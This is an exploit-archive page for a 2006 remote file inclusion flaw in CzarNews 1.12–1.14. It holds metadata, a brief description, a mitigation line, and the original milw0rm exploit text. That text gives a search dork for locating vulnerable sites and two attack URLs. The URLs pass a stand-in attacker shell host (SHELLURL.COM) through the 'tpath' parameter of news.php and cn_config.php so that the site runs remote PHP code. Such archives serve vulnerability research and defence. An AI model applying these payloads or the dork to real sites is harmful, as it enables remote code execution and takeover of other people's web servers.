CzarNews - exploit.company

vendor:

CzarNews

by:

SHiKaA

N/A

CVSS

N/A

Remote File Inclusion

CWE

Product Name: CzarNews

Affected Version From: 1.12

Affected Version To: 1.14

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

CzarNews <= (tpath) Remote File Inclusion Exploit

CzarNews is prone to a remote file-inclusion vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code within the context of the vulnerable application. The attacker can supply a URL to a malicious script in the 'tpath' parameter of the vulnerable script. Successful exploitation requires that 'register_globals' is enabled.

Mitigation:

Disable 'register_globals' and ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

=================================================================
CzarNews <= (tpath) Remote File Inclusion Exploit
================================================================
                                                                |
Critical Level : Dangerous                                       |
                                                                |
=================================================================
Dork :  "CzarNews v1.12 " | "CzarNews v1.13" | "CzarNews v1.14 "

http://sitename.com/news.php?tpath=http://SHELLURL.COM?
http://sitename.com/cn_config.php?tpath=http://SHELLURL.COM?

===============================================================================
Discoverd By : SHiKaA

Conatact : SHiKaA-[at]hotmail.com

GreetZ : Semsemmasr Black_Scorpion Medo_Ye7ya Kambaa  NANA METO7575 Gendiaaa Saw SnIpEr_Sa Masry OSA FEGLA 3amer
=================================================================


# milw0rm.com [2006-07-13]